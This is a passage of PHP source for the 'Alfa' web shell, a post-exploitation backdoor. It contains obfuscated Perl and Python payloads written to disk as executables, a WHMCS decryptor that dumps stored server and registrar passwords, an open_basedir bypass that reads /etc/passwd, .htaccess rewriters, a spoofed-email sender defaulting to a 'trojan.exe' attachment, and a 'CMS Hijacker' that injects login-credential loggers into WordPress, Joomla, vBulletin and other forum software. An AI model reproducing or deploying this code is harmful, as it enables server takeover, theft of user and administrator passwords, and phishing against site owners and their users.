z5LIcA4BHV0iZcH+MDG0mwRR3EM9pZTkNJ7RDutB8YfY9uHOrTiCA/0FfzFrMEUwhpPa3LUDcIJJPgxFgLktdbOUxh28ERXnb9rPWlExBEc4irmEjlH6Cqfuz/9Ai61ddBze9WAKolh5cX3KGrOodWA8yVNfzZnvT2gqalV4l+7GqF2NQ2iM2Y/PA3KleW9Jej8jVWYlhxXX8JOWzdmSFeHSKu7no7u6hux6v/QhOlXE+Y/nU+3o9aPjKJ/a7ICgEweSO46A6wWJbkvp0yoUNvZr/sXZzJfpus97HI2bM6NimQ0oo3ZWD6/S7+USkZiBg65/9GhEHw/juYcdpur76eM3MUFnFvg5VdIAJUBQCQSQk6ARA2Fcw8+7K1Or2M4p1WDJWToPxoqm9eAa+D0SG5cc+2FHqjbNatJUKASduszhiV55d3yVbEiORCTGM6IX7lTzBjYHhiZWZ7BxrfML3JWMlxvWtsrOPteOm1vuC4PLo7PJ9Oz/dMxHDNru73CGF+8G19sMZqna1Jex9iaTN0ShIdW7aKISmUcEjDcFtOZuJyVp2kfr8C0xqD9AFaAWPJSoIH6QV1ufsCTdGMN40XFwbyhAl4TvHezJ37gZk/xxgkvz2CwgBOivO75LoF9n0LGv3lFqi5oOzWovdHehMEDR4nKPdQPiFuv6S6F6qtY4aKSWwGV+V9xjWT8wbQ3rXsnHLy/wXvfv9RRth3DfVFPjhqmLO73WuIw4J/KBqGGQ5xmBn0cx/SRGD+k5YOHuomaMUUDqgKybUCySYOI0TD5tqjGYFoKL4dKksY3maP3uzrJEphJ/CWDoqKLygCiRTqorMaMUqdPc92qLqvKBPiLcawbU0+Pen3QLo9frfX9k4tTcQ3qtprb35b14ytFQd0of/EfDcD2s9Or8g3v6chnaouLKwWUmLvbemPi0SdkxrCxPgJWU3XgxRvQ1I1MvE1VCaBN8QC7AWndRnGsMlJo+GU13GzKFLLK+JQxtpLaSEbt1lfHJLt1b1Kz/w8wblS+FRoAAA==")));';; $py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'\',\'exec\'))'; if($_POST['alfa1']=='perl'){$code = $perl;}else{$code = $py;} if(__write_file($name,$code)){ @chmod($name,0755); echo ' '; } } echo $div; alfafooter(); } function alfaWhmcs(){ alfahead(); echo '
'; function decrypt($string,$cc_encryption_hash){ $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash); $hash_key = _hash($key); $hash_length = strlen ($hash_key); $string = __ZGVjb2Rlcg($string); $tmp_iv = substr ($string, 0, $hash_length); $string = substr ($string, $hash_length, strlen ($string) - $hash_length); $iv = $out = ''; $c = 0; while ($c < $hash_length) { $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c])); ++$c; } $key = $iv; $c = 0; while ($c < strlen ($string)) { if (($c != 0 AND $c % $hash_length == 0)) { $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length)); } $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c])); ++$c; } return $out; } function _hash($string) { if(function_exists('sha1')) { $hash = sha1 ($string); } else { $hash = md5 ($string); } $out = ''; $c = 0; while ($c < strlen ($hash)) { $out .= chr (hexdec ($hash[$c] . $hash[$c + 1])); $c += 2; } return $out; } AlfaNum(8,9,10); echo "
| WHMCS DeCoder |

".getConfigHtml('whmcs')."

"; $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'cc_encryption_hash : ', 'inputName' => 'cc_encryption_hash', 'id' => 'cc_encryption_hash', 'inputValue' => '', 'inputSize' => '50') ); create_table($table); echo "

"; if($_POST['alfa5']!=''){ $db_host=($_POST['alfa7']); $db_username=($_POST['alfa3']); $db_password=($_POST['alfa4']); $db_name=($_POST['alfa5']); $cc_encryption_hash=($_POST['alfa6']); echo __pre(); $conn=@mysqli_connect($db_host,$db_username,$db_password,$db_name) or die(mysqli_error($conn)); $query = mysqli_query($conn,"SELECT * FROM tblservers"); $num = mysqli_num_rows($query); if ($num > 0){ for($i=0; $i <=$num-1; $i++){ $v = @mysqli_fetch_array($query); $ipaddress = $v['ipaddress']; $username = $v['username']; $type = $v['type']; $active = $v['active']; $hostname = $v['hostname']; echo(""); $password = decrypt ($v['password'], $cc_encryption_hash); echo(""); echo(""); echo(""); echo(""); echo(""); echo(""); echo "
Type $type
Active $active
Hostname $hostname
Ip $ipaddress
Username $username
Password $password


"; } $query1 = @mysqli_query($conn,"SELECT * FROM tblregistrars"); $num1 = @mysqli_num_rows($query1); if ($num1 > 0){ for($i=0; $i <=$num1 -1; $i++){ $v = mysqli_fetch_array($query1); $registrar = $v['registrar']; $setting = $v['setting']; $value = decrypt($v['value'], $cc_encryption_hash); if ($value==""){ $value=0; } echo("Domain Reseller
"); echo(""); echo(""); echo(""); echo(""); echo "
Register $registrar
Setting $setting
Value $value


"; } } }else{__alert('tblservers is Empty...!');}; } echo "
"; alfafooter(); } function alfaportscanner(){ alfahead(); echo '


| Port Scaner |


Host:
Port start:
Port end:

'; $start = strip_tags($_POST['alfa2']); $end = strip_tags($_POST['alfa3']); $host = strip_tags($_POST['alfa4']); if(isset($_POST['alfa4']) && is_numeric($_POST['alfa3']) && is_numeric($_POST['alfa2'])){ echo __pre(); $packetContent = "GET / HTTP/1.1\r\n\r\n"; if(ctype_xdigit($packetContent))$packetContent = @pack("H*" , $packetContent); else{ $packetContent = str_replace(array("\r","\n"), "", $packetContent); $packetContent = str_replace(array("\\r","\\n"), array("\r", "\n"), $packetContent); } for($i = $start; $i<=$end; $i++){ $sock = @fsockopen($host, $i, $errno, $errstr, 3); if($sock){ stream_set_timeout($sock, 5); fwrite($sock, $packetContent."\r\n\r\n\x00"); $counter = 0; $maxtry = 1; $bin = ""; do{ $line = fgets($sock, 1024); if(trim($line)=="")$counter++; $bin .= $line; }while($counter<$maxtry); fclose($sock); echo "

Port $i is open

"; echo "

"; } flush(); } } echo '
'; alfafooter(); } function alfacgihtaccess($m,$d='', $symname=false){ $readme = ""; if($symname){$readme="\nReadmeName ".trim($symname);} if($m=='cgi'){ $code = "#Coded By Sole Sad & Invisible\nOptions FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .alfa\nAddHandler cgi-script .alfa"; }elseif($m=='sym'){ $code = "#Coded By Sole Sad & Invisible\nOptions Indexes FollowSymLinks\nDirectoryIndex solevisible.phtm\nAddType text/plain php html php4 phtml\nAddHandler text/plain php html php4 phtml{$readme}\nOptions all"; }elseif($m=='shtml'){ $code = "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml"; } @__write_file($d . ".htaccess", $code); } function alfabasedir(){ alfahead(); echo '


| Open Base Dir |


'; $passwd = _alfa_file('/etc/passwd'); if(is_array($passwd)){ $users = array(); $makepwd = alfaMakePwd(); $basedir = @ini_get('open_basedir'); $safe_mode = @ini_get('safe_mode'); if(_alfa_can_runCommand(true,false)&&($basedir||$safe_mode)){ $bash = "fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP"; $tmp_path = alfaWriteTocgiapi("basedir.alfa",$bash); $bash_users = alfaEx("cd ".$tmp_path."/alfacgiapi;sh basedir.alfa ".$makepwd,false,true,true); $users = json_decode($bash_users, true); $x=count($users); if($x>=2){array_pop($users);--$x;} } if(!$basedir&&!$safe_mode){ $x=0; foreach($passwd as $str){ $pos = strpos($str,':'); $username = substr($str,0,$pos); $dirz = str_replace("{user}", $username, $makepwd); if(($username != '')){ if (@is_readable($dirz)){ array_push($users,$username); $x++; }}} } echo '

'; echo "[+] Founded ".sizeof($passwd)." entrys in /etc/passwd\n"."
"; echo "[+] Founded ".$x." readable ".str_replace("{user}", "*", $makepwd)." directories\n"."
"; echo "[~] Searching for passwords in config files...\n\n"."


"; foreach($users as $user){ if(empty($user))continue; $path = str_replace("{user}", $user, $makepwd); echo "
Change Dir ..:: $user ::..

"; } }else{echo(' [-] Error : coudn`t read /etc/passwd [-]');} echo '

'; echo '
'; alfafooter(); } function alfamail(){ alfahead(); echo '
'; AlfaNum(8,9,10); echo '


| Fake Mail |


'; $table = array( 'td1' => array('color' => 'FFFFFF', 'tdName' => 'Mail To : ', 'inputName' => 'mail_to', 'inputValue' => 'target@fbi.gov', 'inputSize' => '60','placeholder' => true), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'From : ', 'inputName' => 'mail_from', 'inputValue' => 'sec@google.com', 'inputSize' => '60', 'placeholder' => true), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Subject : ', 'inputName' => 'mail_subject', 'inputValue' => 'your site hacked by me', 'inputSize' => '60'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Attach File : ', 'inputName' => 'mail_attach', 'inputValue' => $GLOBALS['cwd'].'trojan.exe', 'inputSize' => '60'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Count Mail : ', 'inputName' => 'count_mail', 'inputValue' => '1', 'inputSize' => '60') ); create_table($table); echo '


Message:


'; if(isset($_POST['alfa4'])&&($_POST['alfa4'] == '>>')){ $mail_to = $_POST['alfa1']; $mail_from = $_POST['alfa2']; $mail_subject = $_POST['alfa3']; $mail_content = $_POST['alfa5']; $count_mail = (int)$_POST['alfa6']; $mail_attach = $_POST['alfa7']; if(filter_var($mail_to, FILTER_VALIDATE_EMAIL)){ if(!empty($mail_attach)&&@is_file($mail_attach)){ $file = $mail_attach; $content = __read_file($file); $content = chunk_split(__ZW5jb2Rlcg($content)); $uid = md5(uniqid(time())); $filename = basename($file); $headers = "From: ".$mail_from." <".$mail_from.">\r\n"; $headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n"; $headers .= "Reply-To: ".$mail_from."\r\n"; $headers .= "Content-Type: multipart/mixed; boundary=\"".$uid."\"\r\n\r\n"; $headers .= 'MIME-Version: 1.0' . "\r\n"; $headers .= 'X-Mailer: php' . "\r\n"; $mail_content = "--".$uid."\r\n"; $mail_content .= "Content-type:text/plain; charset=iso-8859-1\r\n"; $mail_content .= "Content-Transfer-Encoding: 7bit\r\n\r\n"; $mail_content .= $mail_content."\r\n\r\n"; $mail_content .= "--".$uid."\r\n"; $mail_content .= "Content-Type: application/octet-stream; name=\"".$filename."\"\r\n"; $mail_content .= "Content-Transfer-Encoding: base64\r\n"; $mail_content .= "Content-Disposition: attachment; filename=\"".$filename."\"\r\n\r\n"; $mail_content .= $content."\r\n\r\n"; $mail_content .= "--".$uid."--"; }else{ $headers = "From: " . $mail_from. " ( ".$mail_from." ) \r\n"; $headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n"; $headers .= 'Reply-To: '.$mail_from.'' . "\r\n"; $headers .= 'Content-type: text/html; charset=utf-8' . "\r\n"; $headers .= 'MIME-Version: 1.0' . "\r\n"; $headers .= 'X-Mailer: php' . "\r\n"; } if(empty($count_mail)||$count_mail<1)$count_mail=1; if(!empty($mail_from)){echo __pre(); for($i=1;$i<=$count_mail;$i++){ if(@mail($mail_to,$mail_subject,$mail_content,$headers))echo("Sent -> $mail_to
"); }}else{__alert("Invalid Mail From !");} }else{__alert("Invalid Mail To !");} } echo('
'); alfafooter(); } function alfaziper(){ alfahead(); AlfaNum(8,9,10); echo '



| Compressor |


Dir/File:
Save Dir:


'; if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){ $dirzip = $_POST['alfa3']; $zipfile = $_POST['alfa4']; if($GLOBALS['sys']!='unix'&&_alfa_can_runCommand(true,true)){ alfaEx("powershell Compress-Archive -Path '".addslashes($dirzip)."' -DestinationPath '".addslashes(basename($zipfile))."'"); echo __pre().'

Done -> '.$zipfile.'

'; }elseif($GLOBALS['sys']=='unix'&&_alfa_can_runCommand(true,true)){ alfaEx("cd '".addslashes(dirname($zipfile))."';zip -r '".addslashes(basename($zipfile))."' '".addslashes($dirzip)."'"); echo __pre().'

Done -> '.$zipfile.'

'; }elseif(class_exists('ZipArchive')){ if(__alfaziper($dirzip, $zipfile)){ echo __pre().'

Success...!
'.$zipfile.'

'; }else{echo __pre().'

ERROR!!!...

';} } } echo '
'; alfafooter(); } function __alfaziper($source,$destination){ if(!extension_loaded('zip')||!file_exists($source)){ return false; } $zip=new ZipArchive(); if(!$zip->open($destination,ZIPARCHIVE::CREATE)){ return false; } $source=str_replace('\\','/',realpath($source)); if(is_dir($source)===true){ $files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source),RecursiveIteratorIterator::SELF_FIRST); foreach($files as $file){ $file=str_replace('\\','/',$file); if(in_array(substr($file,strrpos($file,'/')+1),array('.','..')))continue; $file=realpath($file); if(is_dir($file)===true){ $zip->addEmptyDir(str_replace($source.'/','',$file.'/')); }else if(is_file($file)===true){ $zip->addFromString(str_replace($source.'/','',$file),file_get_contents($file)); } } }else if(is_file($source)===true){ $zip->addFromString(basename($source),file_get_contents($source)); } return $zip->close(); } function alfadeziper(){ alfahead(); AlfaNum(8,9,10); echo '



| DeCompressor |


File:
Extract To:


'; if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){ $dirzip = $_POST['alfa3']; $zipfile = $_POST['alfa4']; if(@!is_dir($zipfile)){ @mkdir($zipfile, 0777, true); } $finfo = ""; $file_type = ""; if(function_exists('finfo_open')){ $finfo = @finfo_open(FILEINFO_MIME_TYPE); $file_type = @finfo_file($finfo, $dirzip); @finfo_close($finfo); }else{ if($GLOBALS['sys']=='unix'&&_alfa_can_runCommand(true,true)){ $file_type = alfaEx('file -b --mime-type ' . $dirzip); } } if($GLOBALS['sys']!='unix'&&_alfa_can_runCommand(true,true)){ alfaEx("powershell expand-archive -path '".addslashes($dirzip)."' -destinationpath '".addslashes(basename($zipfile))."'"); echo __pre().'

Done -> '.$zipfile.'

'; }elseif($GLOBALS['sys']=='unix'&&!empty($file_type)&&_alfa_can_runCommand(true,true)&&(strlen(alfaEx('which unzip')) > 0||strlen(alfaEx('which tar')) > 0||strlen(alfaEx('which gunzip')) > 0)){ switch ($file_type) { case 'application/zip': alfaEx("cd '".addslashes($zipfile)."';unzip '".addslashes($dirzip)."'"); break; case 'application/x-tar': case 'application/x-gzip': case 'application/x-gtar': if(strstr(basename($dirzip), ".tar.gz")||strstr(basename($dirzip), ".tar")){ alfaEx("cd '".addslashes($zipfile)."';tar xzf '".addslashes($dirzip)."'"); }else{ alfaEx("cd '".addslashes($zipfile)."';gunzip '".addslashes($dirzip)."'"); } break; } echo __pre().'

Done -> '.$zipfile.' [ View Folder ]

'; }elseif(class_exists('ZipArchive')){ $itsok = false; if(emtpy($file_type)){ $file_type = "application/zip"; } switch ($file_type) { case 'application/zip': $zip = new ZipArchive; $res = $zip->open($dirzip); if ($res) { $zip->extractTo($zipfile); $zip->close(); $itsok = true; } break; case 'application/x-tar': case 'application/x-gzip': case 'application/x-gtar': if(strstr(basename($dirzip), ".tar.gz")){ $new_file = $zipfile .'/'. basename($dirzip); @copy($dirzip, $new_file); $new_tar = str_replace(".tar.gz", ".tar", $new_file); try { $p = new PharData($new_file); $p->decompress(); $phar = new PharData($new_tar); $phar->extractTo($zipfile); @unlink($new_file); @unlink($new_tar); $itsok = true; } catch (Exception $e) { } }else{ try { $phar = new PharData($dirzip); $phar->extractTo($zipfile); $itsok = true; } catch (Exception $e) { } } break; } if($itsok){ echo __pre().'

Success...!
'.$zipfile.' [ View Folder ]

'; }else{echo __pre().'

ERROR!!!...

';} } } echo '
'; alfafooter(); } function alfacmshijacker(){ alfahead(); AlfaNum(5,6,7,8,9,10); echo '

| Cms Hijacker |


CMS: "); echo ' Path installed cms: SaveTo:

'; $cms = $_POST['alfa1']; $saveto = $_POST['alfa2']; $cmspath = $_POST['alfa4']; if(!empty($cms) AND !empty($saveto) AND $_POST['alfa4'] AND $_POST['alfa3'] == '>>'){ echo __pre(); alfaHijackCms($cms,$cmspath,$saveto); } echo '
'; alfafooter(); } function alfaHijackCms($cms,$cmspath,$saveto){ switch($cms){ case "vb": hijackvBulletin($cmspath,$saveto); break; case "wp": hijackwp($cmspath,$saveto); break; case "jom": hijackJoomla($cmspath,$saveto); break; case "whmcs": hijackWhmcs($cmspath,$saveto); break; case "mybb": hijackMybb($cmspath,$saveto); break; case "ipb": hijackIPB($cmspath,$saveto); break; case "phpbb": hijackPHPBB($cmspath,$saveto); break; default: echo "error!"; break; } } function hijackvBulletin($path,$saveto){ $code='$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);$alfa_password = $vbulletin->GPC["vb_login_password"];$alfa_file = "{saveto_path}";$sql_query = $vbulletin->db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE `username`=\'" . $alfa_username . "\'");while($row = $vbulletin->db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, "a+");@fwrite($fp1, $alfa_username . \' : \' . $alfa_password." (" . $row["email"] . ")\n");@fclose($fp1); $f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}'; $clearpw = 'defined(\'DISABLE_PASSWORD_CLEARING\')'; $code=str_replace('{saveto_path}',$saveto,$code); $login = $path."/login.php"; $class = $path."/includes/class_bootstrap.php"; $dologin = 'do_login_redirect();'; $evil_login = "\t".$code."\n\t".$dologin; $evil_class = "true"; if((@is_file($login) AND @is_writable($login)) || (@is_file($class) AND @is_writable($class))){ $data_login = @file_get_contents($login); $data_class = @file_get_contents($class); if(strstr($data_login, $dologin) || strstr($data_class, $clearpw)){ $login_replace = str_replace($dologin,$evil_login, $data_login); $class_replace = str_replace($clearpw,$evil_class, $data_class); @file_put_contents($login, $login_replace); @file_put_contents($class, $class_replace); hijackOutput(0,$saveto); }else{ hijackOutput(1); } }else{ hijackOutput(1); } } function hijackwp($path,$saveto){ $code = '$alfa_file="{saveto_path}";$fp = fopen($alfa_file, "a+");fwrite($fp, $_POST[\'log\']." : ".$_POST[\'pwd\']." (".($user->user_email).")\n");fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);'; $redirect_wp = '#if[ ]{0,}\([ ]{0,}![ ]{0,}is_wp_error\([ ]{0,}\$user[ ]{0,}\)[ ]{0,}&&[ ]{0,}![ ]{0,}\$reauth[ ]{0,}\)[ ]{0,}{#'; $code=str_replace('{saveto_path}',$saveto,$code); $login=$path."/wp-login.php"; if(@is_file($login) AND @is_writable($login)){ $data_login = @file_get_contents($login); if(@preg_match($redirect_wp, $data_login, $match)){ $evil_login = "\t".$match[0]."\n\t".$code; $login_replace = @preg_replace($redirect_wp,$evil_login, $data_login); @file_put_contents($login, $login_replace); hijackOutput(0,$saveto); }else{ hijackOutput(1); } }else{ hijackOutput(1); } } function hijackJoomla($path,$saveto){ $code = ' $_POST[\'username\'],\'password\'=>$_POST[\'passwd\']);$Alfa_options = array();$Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);if($Alfa_response->status == 1){$alfa_file="{saveto_path}";$fp=@fopen($alfa_file,"a+");@fwrite($fp, $Alfa_response->username.":".$_POST[\'passwd\']." ( ".$Alfa_response->email." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}?>'; $code=str_replace('{saveto_path}',$saveto,$code); $comp=$path."/administrator/components/com_login/"; if(@is_file($comp."/login.php")){ $login = $comp."/login.php"; }elseif(@is_file($comp."/admin.login.php")){ $login = $comp."/admin.login.php"; }else{ $login = ''; } if(@is_file($login) AND @is_writable($login) AND $login != ''){ $data_login = @file_get_contents($login); $evil_login = $code."\n".$data_login; @file_put_contents($login, $evil_login); hijackOutput(0,$saveto); }else{ hijackOutput(1); } } function hijackWhmcs($path,$saveto){ $code = ' 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(\':\', $row[\'password\']);$__encPW = md5($__salt[1].$_POST[\'password\']).\':\'.$__salt[1];if($row[\'password\'] == $__encPW){$allow = true;$row[\'username\'] = $row[\'email\'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, "a+");@fwrite($fp, $row[\'username\'] . \' : \' . $alfa_pw." (" . $row["email"] . ") : ".($admin ? \'is_admin\' : \'is_user\')."\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>'; $code=str_replace('{saveto_path}',$saveto,$code); $conf=$path."/configuration.php"; if(@is_file($conf) AND @is_writable($conf)){ $data_conf = @file_get_contents($conf); if(!strstr($data_conf,'?>'))$code = '?>'.$code; $evil_conf = $data_conf."\n".$code; @file_put_contents($conf, $evil_conf); hijackOutput(0,$saveto); }else{ hijackOutput(1); } } function hijackMybb($path,$saveto){ $code = '$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = \'".$user[\'username\']."\'");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = "{saveto_path}";$fp = @fopen($alfa_file, "a+");@fwrite($fp, $user[\'username\']." : ". $user[\'password\']." ( ".$alfa_fetch[\'email\']." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);'; $find = '$loginhandler->complete_login();'; $code=str_replace('{saveto_path}',$saveto,$code); $login=$path."/member.php"; $evil_login = "\t".$code."\n\t".$find; if(@is_file($login) AND @is_writable($login)){ $data_login = @file_get_contents($login); if(strstr($data_login, $find)){ $login_replace = str_replace($find,$evil_login, $data_login); @file_put_contents($login, $login_replace); hijackOutput(0,$saveto); }else{ hijackOutput(1); } }else{ hijackOutput(1); } } function hijackIPB($path,$saveto){ $code = '$Alfa_q = $this->DB->buildAndFetch(array(\'select\' => \'email\', \'from\' => \'members\', \'where\' => \'name="\'.$username.\'" OR email="\'.$email.\'"\'));$Alfa_file = "{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $_POST[\'ips_username\'].\' : \'.$_POST[\'ips_password\'].\' ( \'.$Alfa_q[\'email\'].\' )\'."\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);'; $find = 'unset( $member[\'plainPassword\'] );'; $code=str_replace('{saveto_path}',$saveto,$code); $login=$path."/admin/sources/handlers/han_login.php"; $evil_login = "\t".$find."\n\t".$code; if(@is_file($login) AND @is_writable($login)){ $data_login = @file_get_contents($login); if(strstr($data_login, $find)){ $login_replace = str_replace($find,$evil_login, $data_login); @file_put_contents($login, $login_replace); hijackOutput(0,$saveto); }else{ hijackOutput(1); } }else{ hijackOutput(1); } } function hijackPHPBB($path,$saveto){ $code = '$Alfa_u = request_var(\'username\', \'\');$Alfa_p = request_var(\'password\', \'\');if($Alfa_u != \'\' AND $Alfa_p != \'\'){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);if($Alfa_response[\'status\'] == LOGIN_SUCCESS){$Alfa_file ="{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $Alfa_u." : ".$Alfa_p. " ( ".$Alfa_response[\'user_row\'][\'user_email\']." )\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}'; $find = 'case 